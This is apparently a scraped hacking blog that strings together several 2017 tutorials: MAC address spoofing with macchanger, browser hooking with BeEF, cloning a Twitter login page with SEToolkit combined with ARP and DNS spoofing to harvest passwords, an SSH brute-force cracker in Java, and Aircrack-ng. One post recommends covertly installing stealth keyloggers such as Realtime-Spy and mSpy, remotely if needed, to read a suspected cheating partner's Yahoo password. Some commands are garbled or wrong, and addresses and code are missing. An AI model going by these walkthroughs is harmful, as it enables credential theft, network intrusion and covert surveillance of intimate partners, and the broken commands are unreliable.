Friday, July 28, 2017

How to Use Macchanger

Macchanger User Guide

One fundamental skill that any knowledgeable hacker needs to learn is how to spoof various addresses. In this particular tutorial we will be talking about macchanger but when most people think about spoofing an address, they typically think of masking their IP address with NAT or a VPN tunnel. That said, users also need to learn how to spoof their MAC address.
What is a MAC Address, and What Are They Used for?
Unlike an IP address (a layer 3 address), MAC addresses operate at layer two of the OSI model. As the name implies (Media Access Control), they are used to control and identify different computing systems as they connect to a layer two medium such as a wireless network or a LAN switch. Also understand that each network card has a globally unique MAC address that is composed of two parts – the OUI (Organizationally Unique Identifier) and a unique ID.
MAC addresses are composed of 12 hexadecimal digits, and the first six identify the network card manufacturer. The remaining 6 digits identify a unique network card specific to any given manufacturer. If you want to see who made your network card, simply Google the first six digits of your MAC address. The following are just a few of uses of MAC addresses:
  • Static IP’s – If a network administrator didn’t want to use DHCP, they can configure static IP addresses. This is most typically done for servers since it would be a disadvantage if their IP addresses were constantly changing.
  • Address Filtering – some network administrators only allow specific devices to connect to a network, and they make filtering decisions based on MAC addresses since they are globally unique.
  • Authentication Applications – Sometimes ISPs and other network services require a user to sign in or log on with their MAC address.
  • Identification and Temporal Services – Often coffee shops and airports will only permit a short amount of free Internet (30 minutes to an hour). After the time limit has been reached, they will sometimes ban a MAC address, but spoofing your address will allow more free access.
  • Tracking Devices – Because every MAC address is globally unique, it is possible for software to track which locations and networks individual computers connect to.
Mac-2The following is an example of a valid MAC address:
  • 00:40:96:43:b7:de
In this example, 00:40:96 is the OUI that identifies this MAC address as belonging to a Cisco Aironet product. If you are using a Windows computer and you wish to view your MAC address, the procedure is relatively simple. First, simply open the command prompt by hitting the Windows key and typing “cmd.” This should pull up an application with an icon that looks like a small black window. Once the command prompt has been opened, issue the following command:
  • ipconfig /all
This will display a wealth of information about your computer’s various network interfaces. However, we are interested in the field labeled “physical address,” which will display each network interface’s MAC address. Users on Apple systems or Linux systems can issue the following variant of theifconfig command:
  • ifconfig -a
Why Spoof Your Mac Address?
The first reason is to ensure that they cover their tracks and don’t leave their globally unique MAC address in tables on a wireless router or network switch. These devices keep tables of known MAC addresses and bind them to layer three addresses, such as an IP address. Essentially, this would leave an audit trail that would lead back to the hacker’s computer. But there are many other reasons.
Believe it or not, some network administrators control access to their network by only permitting known MAC addresses to send data on the local network. If a hacker’s MAC address wasn’t allowed to send data, the hacker couldn’t even send a ping to another computer on the local network. However, if they know a device that ispermitted to send data, all the hacker needs to do is spoof their MAC address to a known host’s MAC address to gain network access.
Macchanger Tutorial
In this demonstration, we are going to run through the steps necessary to use Macchanger to spoof our IP address from an Ubuntu command line (BASH shell). We will be performing the commands on an Ethernet interface, but the same concept and procedure applies to other interfaces. Furthermore, there are comparable alternatives to Macchanger for Windows and Apple systems, and some of them even have GUI interfaces that are ludicrously simple and easy to use.
Step 1
The very first thing we need to do is verify that our Ethernet interface is up and running. It is also advisable to check the card’s actual physical address. So, to start off, run the ifconfig eth0 command to check the status of your network card.
Step 2
The next thing we need to do is shut down our Ethernet interface to make the change. To disable the Ethernet interface, issue the ifconfig eth0 downcommand.
Step 3
Next, simply use Macchanger to spoof the MAC address. By entering themacchanger -r eth0 command, users can change their MAC address to a randomly generated address.
Step 4
Sometimes users may encounter the following error:
  • ERROR: Can’t change MAC: interface up or not permission: Cannot assign requested address
If this is the case, make sure that two things are true. Firstly, ensure that your Ethernet interface is truly down with the ifconfig eth0 down command. Secondly, make sure that you are running these commands as the root user.
Step 5
Verify that the MAC address has truly been changed with the ifconfig eth0command. If you wish to enter a specific MAC address instead of a randomly generated one, users can use the mac changer -m [MAC ADDRESS]command.
Final Thoughts
It’s pretty darn easy to configure a new MAC address for a Linux system. In fact, the operation shouldn’t even take novices more than a minute to complete. Remember, spoofing addresses is a pretty basic skill for a hacker to learn. I would also caution you not to use this information to break into a network that you don’t have permission to access. If, for example, your MAC address is blocked, I wouldn’t advise you to employ these methods to gain access, because doing so could be illegal depending on the context and location of the network in question. At any rate, this simple demonstration should show you just how easy it is to spoof a MAC address.

How to Hijack Web Browsers Using BeEF

Welcome back my fellow hackers! Today we’re going to be introducing a new tool for hacking web browsers. Often times, we will need to exploit a variety of vulnerabilities associated with web browsers. For this sort of exploitation, we can use a popular tool named BeEF (Browser e Exploitation Framework).
How BeEF works is actually fairly easy to understand. There is a JavaScript file provided by BeEF, simply namedhook.js. Our job as the attacker is to find a way to run this JavaScript on the victim’s browser. Once it’s been run, we will have control over their browser in various aspects. There are multiple ways we can execute this script. For example, we could set up a phishing page with the hook inside of the HTML code, or we could inject it into their traffic using a Man in the Middle attack. But today we’re just going to be using the demo page provided by BeEF. So, let’s get started!

Step 1: Start up and Login to BeEF

If we’re going to use BeEF, we need to start it! If you’re using Kali 2, you can find BeEF on the dock. If you are aren’t using Kali 2, you can launch BeEF by enter the following command:
service beef-xss start
Now that we’ve started BeEF, we need to login. If we point our web browser at the localhost on port 3000 with the /ui/authentication URI, we will see the BeEF login page (In short: When we see this page, we need to enter the default credentials in order to use BeEF. The default username and password are both “beef.” Let’s go ahead and log in now:
Alright, now that we’ve entered our credentials and logged in, we can see the first page. Let’s take a look at this page and then we’ll break it down:
Now, to our immediate left we can see a section named “hooked browsers.” This is where BeEF will list all the browsers we currently have under our control. There is only one victim here at the moment, which is ourselves. Now that we’ve logged in and seen the start page, let’s move on to hooking our victim.

Step 2: Hook the Victim

Now that we have BeEF up and running, we need to hook the victim so that we can control their browser. We will be using the BeEF demo page to run the hook. Now we need to move the victim and navigate to the demo page. The demo page can be accessed in the browser by entering the address of the attacking system on port 3000 under /demos/basic.html. So, for our demonstration today, we need to enter on our victims browser, let’s do that now:
Now that we’ve navigated our victim to the demo page containing the BeEF hook, we should see them appear under the “hooked browsers” section we saw earlier:
There we go! We’ve successfully hooked our victims browser. Now that we have some basic control over it, we can do many things that will aid us in compromising this victim.

Step 3: Wreak Havoc

Now that we can control our victims browser, we’re going to demonstrate the kind of things we can do. We’re simply going to use some JavaScript to find out what plugins are installed on the browser. First, we need to select our victim and navigate to the “commands” tab of BeEF’s GUI. Let’s see what this looks like now:
Now that we’ve navigated to our commands tab, we can look through all of the possible commands we can execute on the victim’s browser. Please note that not all of these will work as some of them are circumstance specific. The one we’re after in this instance is the raw javascript module. We can find this module under the “Misc” folder in the commands tab. Let’s select this module now:
We can see that in this module we have a box to enter some JavaScript. In order to see the plugins that the victim has, we’re going to return some information out the the “navigator” object using our code. We’re also going to make an alert box appear in the victim’s browser, just for fun. Let’s take a look at this code now:
Now that we have entered our code to execute, we simply need to press the “execute” button on the bottom right of the BeEF page. Once we do this, we should see the JavaScript return an array containing the currently installed plugins. Let’s execute our code and see the results now:
Here can see a list of all the plugins that the victim has installed on their browser! We could look deeper and see if there any exploitable vulnerabilities in these plugins, but that’s best discussed later. Now that we have our results, let’s move back to the victim and take a look at our alert box!
There we have it! We were not only able to successfully hijack our victim’s browser, but we were able to extract information from it that could open a future avenue for attack! As we’ve demonstrated here today, browser hijacking can be extremely useful to any hacker looking for a way into a system. Not only is it good for finding the vulnerabilities, but in some cases we can use it to exploit them as well. That’s all for the introduction to hijacking with BeEF. In the next article, we’ll be taking a closer look at social engineering with BeEF, and how we can use it to steal credentials from the user! I’ll see you there!

Thursday, July 27, 2017

How Hackers Steal Passwords using the SEToolkit

Welcome back my fellow hackers! In the past few articles we’ve been preparing to steal credentials from users on our local network, and today we’re going to be performing this attack. We’ll start by explaining the anatomy of the attack, and then we’ll perform the attack for ourselves. We’re going to be using aHow Hackers Spy on People with a Man in the Middle Attack

The Anatomy of Credential Capturing

First, we’ll be discussing the basic anatomy of credential capturing. First, we’ll take a quick look at Man in the Middle attacks and DNS spoofing. Since we’ve already covered this we won’t be going too far into detail. If you need a refresher on these attacks, see the links above.
Man in the Middle attacks are very simple. An attacker simply places themselves between two parties so that all traffic flows through them. This way, the attacker can read all unencrypted traffic. The Man in the Middle in and of itself isn’t very powerful. But it opens the gateway to many other kinds of attacks. A MitM attack can be seen in the diagram below.
Next up, we have DNS spoofing, which we’ve also covered before. These attacks are also rather simple. The attacker (us), listens for DNS queries for a certain host, and spoofs the response to that request with whatever address they want. This way they can redirect the victim to whatever address they wish. DNS spoofing can be seen in the following diagram.
Alright, now that we’ve reiterated all of the attacks we’ve already done, it’s time to move on to the interesting stuff, stealing passwords! We’re going to be using something call the Social Engineering Toolkit, or SEToolkit (SET) for short. This toolkit is something that any hacker should be at least a little familiar with. This allows us to perform many different social engineering attacks. One of these social engineering attacks is the credential harvester, which will clone whatever website we give it and save a copy of it to our local machine. This lets us set up a server on our attacking machine and server the page just as the legitimate web server would. That’s about it for the anatomy of this attack, so let’s move on!

Performing the Attack

Step 1: Use the SEToolkit Credential Harvester Module

First, we’re going to clone the site with SEToolkit to get that out of the way. To start SET we just use the setoolkitcommand.
After a little while, and maybe a prompt or two, the SET should be ready to go. Once it boots up, we should see a menu that looks something like the screenshot below. We’re going to be choosing the first option, social engineering attacks.
Now we should be presented with another set of numbered options, we’re going to be selecting the second option, website attack vectors.
Guess what we have next! That’s right, more number menus! In this next menu we’ll be selecting the third option, the credential harvester attack method. Don’t worry about all these other options, we’ll get to them in due time.
Now all we have to do before putting in our attack details is select the site cloner, which is the second option.
Alright, now that we’re in the correct area of SET to enter our attack information, we need to get some information to enter! To start, we’re going to get our local IP address, which we’ll need to give to SET. We can get this by using the ifconfig command.
Now that we have our local IP address (, we can hand it to SET in the first site cloner prompt.
Next, it will ask for the URL of the site we want to clone. This will clone the website and save it to our machine. We’ll be stealing an unsuspecting Twitter user’s password, so we’ll be cloning the Twitter website.
It should go on to clone the Twitter login page. Once its done cloning, it should ask us if we want to start the Apache web server process, go ahead and say yes to this prompt in order to avoid having an extra step.
You may need a little patience as this can take some time depending on your connection speed, but after some we should get confirmation that the site has been cloned into the Apache location and that the Apache service has been started.

Step 2: Start the Man in the Middle Attack

In order to perform DNS spoofing, we need to be able to see the victims traffic, so we’re going to use a man in the middle attack to place ourselves between the victim and default gateway. First, we need to find the address of the default gateway, which we can get using the route command.
We can see that the address of our gateway is (remember to enable IP forwarding before continuing. You can enable it with this command: echo 0 > /proc/sys/net/ipv4/ip_forward). In order to make our job easier, we already have the address of our victim, Now that we have this information, we can start the MitM with the arpspoof tool.
Now that the MitM is started, we can move on!

Step 3: Start the DNS Spoofing Attack

In order to perform our DNS spoofing attack we need to edit the file at /etc/hosts. This will tell the DNS spoofing tool what sites we want to spoof replies for. Since we’re pretending to be Twitter, we’re going to add the following line to the /etc/hosts file.
Now that we’ve added this line, the DNS spoofing tool will know that we want to spoof replies to responses for Twitter. Now we just have to start the dnsspooftool and we’re good to go!

Step 4: Capture the Credentials

Now that we have all our attacks running, we can capture the credentials of our victim! From our victim PC, let’s point the browser at Twitter and try to log in.
Seems legit, huh? The biggest give-away for this attack is the message of using the mobile version of Twitter.
I’ve entered fake credentials for a fake user named victim_user and I’ve also entered a fake password. When we try and log in it will fail and we’ll be redirected to the real Twitter. It is at this point that we should cut all the attacks that way to we don’t raise any suspicion by playing with the victims traffic when we don’t need to.
Now that we’ve tricked our victim into logging in, let’s go to the Apache service files and see if anything new has shown up.
We can see that a new text file has appeared with the harvester name. This file should contain the captured credentials of the user, so let’s crack it open and find out!
There we have it! We were able to use MitM and DNS spoofing attacks in order to perform a credential harvesting attack! This is more than just a step-by-step on stealing passwords, it’s a proof of concept. By learning the in’s and out’s of these smaller attacks such as Man in the Middle and DNS spoofing, we can combine them together to make for a much more powerful attack. There’s a deeper message here, and that message is this: hacking is more than just technical skills. Hacking is just as much about creativity as it is about knowing your way around a computer, and today we’ve proven that.

Tuesday, July 25, 2017

How to Hack Yahoo Password

Every day, a lot of people contact me about suspecting their boyfriend or girlfriend of cheating and ask me about ways to hack Yahoo password of their account. By doing so they hope to investigate the truth about their partners.
If you are in a similar situation or just wondering to know how to hack a Yahoo password, this post can surely help you out.

1. Keylogging: Easiest Way to Hack Yahoo Password

Using a keylogger is the easiest way to gain access to Yahoo and other online account passwords. A keylogger is a small program that runs in a hidden mode and captures each and every keystroke (including passwords) that a user types on the computer’s keyboard. This makes it possible for one to easily obtain the password of any Yahoo account.
The special thing about keylogger is that anyone with a basic knowledge of computer should be able to install and use it. With my experience, I recommend the following keylogger as the best for your password hacking needs:
Easily Access Yahoo Password

Key Features of Realtime-Spy:
    After installation, Realtime-Spy operates in a total stealth mode to capture the password of target Yahoo user. This makes it that makes it impossible to detect its presence. Hence, you can relax and stop worrying about being traced back.
    In addition to installation on a local computer, this program also support remote installation. That means, you can install it even on those computers for which you do not have physical access and record Yahoo activity on it.
    Once installed on the target computer, Realtime-Spy captures all the keystrokes (including passwords of Yahoo and other online accounts). The logs are then continuously uploaded to the Realtime-Spy servers. You can access the logs on your web browser from any place at any time to obtain the password of target Yahoo user.
    Realtime-Spy is fully compatible with Windows XP/Vista/7/8 (32 and 64-bit) and Mac.
FAQs About Realtime-Spy:
I don’t have physical access to the target computer, what can I do?
You need not worry! As Realtime-Spy offers Remote Installation Feature, it is possible to install it on the computer (on which the target Yahoo user is likely to access his/her Yahoo account). However, local installation is also supported.
Does Realtime-Spy collect any personal information from me?
Realtime-Spy does not collect any personal information from its users. Your privacy is totally guaranteed!
Is Realtime-Spy trustworthy?
Realtime-Spy is backed by thousands of trusted users across the world over the last ten years. It is a software program developed by Spytech Software and Design, Inc. which is one of the reputed company in United States.
What are the other features of Realtime-Spy software?
  • With Realtime-Spy, you can gain access to any password protected account including Yahoo, Gmail, Hotmail, Facebook etc.
  • This software will not only capture passwords (Yahoo, Gmail etc.), but will also take screenshots and record chat conversations.
You can grab Realtime-Spy from the link below:

Download Realtime-Spy – for Windows
Download Realtime-Spy – for Mac

If the target user is likely to access his/her Yahoo account from a mobile device, you will have to go for the mobile version of the above program called mSpy:
Download mSpy – for Mobile Devices
Supported Phones: Android Phones, iPhones, Apple iPads and Android Tablets.

2. Other Ways To Hack Yahoo Password

The other most commonly used trick to hack Yahoo password is by using a fake login Page (also called as Phishing). Today, phishing is the most widely used technique to hack Yahoo password. Afake login page is a page that resembles the login pages of sites like Yahoo, Gmail, Facebook etc. The victim is tricked to believe this fake Yahoo login page to be the real one. But once the user enters the password there, the login details of his/her Yahoo account end up falling in the hands of the hacker.
Phishing can be very effective when implemented successfully. But creating a fake login page for websites like Yahoo and taking it online to make the hack attempt successful is not an easy job. It demands an in depth technical knowledge of HTML and scripting languages like PHP and PERL.
Phishing is a Cyber Crime
Carrying out a phishing attack is a criminal offense and if caught one can be behind the bars! So, if you are a novice computer user with a very basic knowledge, I recommend the use of keyloggers as the best way to hack Yahoo password.
None of the Yahoo hacking methods other than those mentioned above are known to work successfully. So, if you come across any other method it should either be an obsolete one or just a scam.
Some sites are also found to be making false promises that they can give access to any Yahoo account for which the users will have to take up a few surveys. In a hope of getting the Yahoo password users complete the surveys but no password is offered to them upon completion. So, beware of those fake Yahoo hacking sites and do not waste your time on them.

How to Build an SSH Password Cracker in Java

Welcome back everybody! I’m back and better than ever with a new round of fresh hacks to share with you! So, with that out of the way, let’s talk about what we’ll be doing today.
There are many services that require passwords in order to access their goodies. Often times we, the attackers, need to steal these passwords in order take said goodies. One of these services is SSH (Secure SHell). SSH allows for the remote management and use of things like network devices and servers. If we could find the SSH password, we could have control over the target system!
Normally, we could look for some password disclosure vulnerability or do some social engineering. But, when all else fails, we can use brute force to try and crack the password the hard way. Today we’ll be building a tool that will go through a list of possible passwords to see if they’re correct. We’ll be building our password cracker in Java, so let’s get started!

Step 1: Downloading JSch

To make a long story short, Java does not natively support the SSH protocol. This means that we’ll have to use a third-party package in order to build our password cracker.
The package we’ll be using is JSch. This will allow us to perform the SSH logins, so we need to download it and import it in our Java code. You can download it by running the following command:
wget -q –show-progress -O jsch.jar
We should get output that looks like this:
Now that we’ve downloaded the package we need, we can get to actually coding our password cracker!

Step 2: Importing Packages

In Java, we need to import quite a number of packages before we can get started building. This step is rather simple to explain, we’re just going to import a bunch of packages. So, let’s do that now:
We can see here that we import a small number packages, ending with our newly downloaded JSch package. Now that we have our packages, we can get started on the exciting stuff!

Step 3: Declaring Class and Checking Host

In Java, all functions for a certain program must be stored under the class for that program. So, since our program name is sshbrute then our class name will also be sshbrute. Pretty simple, right? After we declare our class, we’re going to make our first function. This function will attempt to connect to a given port on the target system. This is to ensure that the port specified by the attacker is, in fact, open. So, let’s take a look at this code:
Let’s break this down really quick. First, we declare our sshbrute class, nothing special there. Next, we make a function named checkHost. This function opens a socket and attempts to connect to a port given as an argument (this connection attempt does have a timeout set). Let’s move on to the next section!

Step 4: Reading a Wordlist

The way this password cracker will work is that it will attempt to log in to an SSH service with a set of passwords. This set of passwords is called a wordlist. These are normally stored in normal text files, so we need to have a function to read a text file and extract all the passwords we need to try. Let’s take a look at it:
First of all, our function takes a single argument, a file path. This will be the path to the wordlist file we need to read. Next, it declares an array list to store the passwords in. An array list is like a dynamic array, so we don’t have to give it a buffer, we can just add things to it (that makes our job much easier).
After declaring our array list, we open up the wordlist file with a buffered reader. We then read the file line-by-line and add each line to the array list until there are no more lines left in the file. Once this is complete, we return our completed array list. Now that we can read and store a wordlist, we can build the function to try them.

Step 5: Attempting Logins

Before we try all of these passwords, we need a function that will accept one password and try it out. This will keep everything organized in our final function. We’ll take a look at the code, then break it down:
This function is rather simple. We simply dissected the example code given by the JSch developer website and ripped out the code that is used to log in to SSH. This function will make a new session, configure the password and key checking, and attempt to log in to the service. It will then disconnect from the service and return true or false.
Now that we have all our base functions, we can finally make our main function.

Step 6: Build the Main Function

Every Java program must have a main function. This is the function that will executed when we run our program. We’ll start the main function by taking some command line arguments and assigning some variables. Let’s take a look at the first half of our main function:
We start by checking for the correct amount of arguments, if not, we provide a very basic usage message to the user. If the correct amount of arguments are supplied, we declare two variables; one being the host address, the other being the port running the SSH service (normally this port is 22, but an admin may configure it to run on a different port for added security).
We then do some checking on the first argument and fill out our variables accordingly. Now that we’ve got this out of the way, we can see the second half of our main function:
In the second half of our main function, we use all the functions we made earlier. First, we call the checkHostfunction to make sure the target is up and running. We’ve also assigned the target username to it’s own variable. We then make a new array list and store the result of our wordlist-reading function in it.
Next, we print that the cracking has started, along with some information about the attack. Once this print happens, the cracking begins! We start by making a for loop that will iterate through the length of our wordlist. For each iteration, it will call that password out of the wordlist and pass it to the crackPass function. If the login is successful, we inform the user and shutdown the program. Otherwise, we keep going until we run out of passwords.
There we have it, our SSH password cracker is complete! Now we move on to the final step.

Step 7: Testing it Out

Before we end our session today, we’re going to test out our new password cracker..I have a simple server set up on my local network running OpenSSH server. So let’s crack this password!
First, we need to compile our Java code into a class file that we can execute:
We can see here that we need to use the -cp flag to force the JSch package to be used in the compilation. Then, we execute the program while again forcing it to use the JSch package. Now that we have our program compiled, we need a wordlist to use. Let’s make a simple wordlist now:
Nothing really special here, just using some commands to make a very small wordlist. Now that we have a wordlist, we can use it to crack the SSH password:
We then execute the program again (forcing the JSch package) and pass all our arguments. We see the functions executing before our eyes for a minute before it returns that the credentials were found. We successfully cracked an SSH password!

Hack Any Wireless Network With AirCrack-Ng

Hack Any Wireless Network With AirCrack-Ng

Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools. In fact, Aircrack-ng is a set of tools for auditing wireless networks.

Aircrack-ng is the next generation of aircrack with lots of new features:

  • Better documentation (wiki, manpages) and support (Forum, trac, IRC: #aircrack-ng on Freenode).
  • More cards/drivers supported
  • More OS and platforms supported
  • New WEP attack: PTW
  • WEP dictionnary attack
  • Fragmentation attack
  • Improved cracking speed
  • Capture with multiple cards
  • New tools: airtun-ng, packetforge-ng (improved arpforge), wesside-ng, easside-ng, airserv-ng, airolib-ng, airdriver-ng, airbase-ng, tkiptun-ng and airdecloak-ng
  • Optimizations, other improvements and bug fixing


PowerShell Empire Download – Post-Exploitation Hacking Tool

PowerShell Empire Module Categories Currently Empire Power Shell has the following categories for modules: Code Execution – Ways to ru...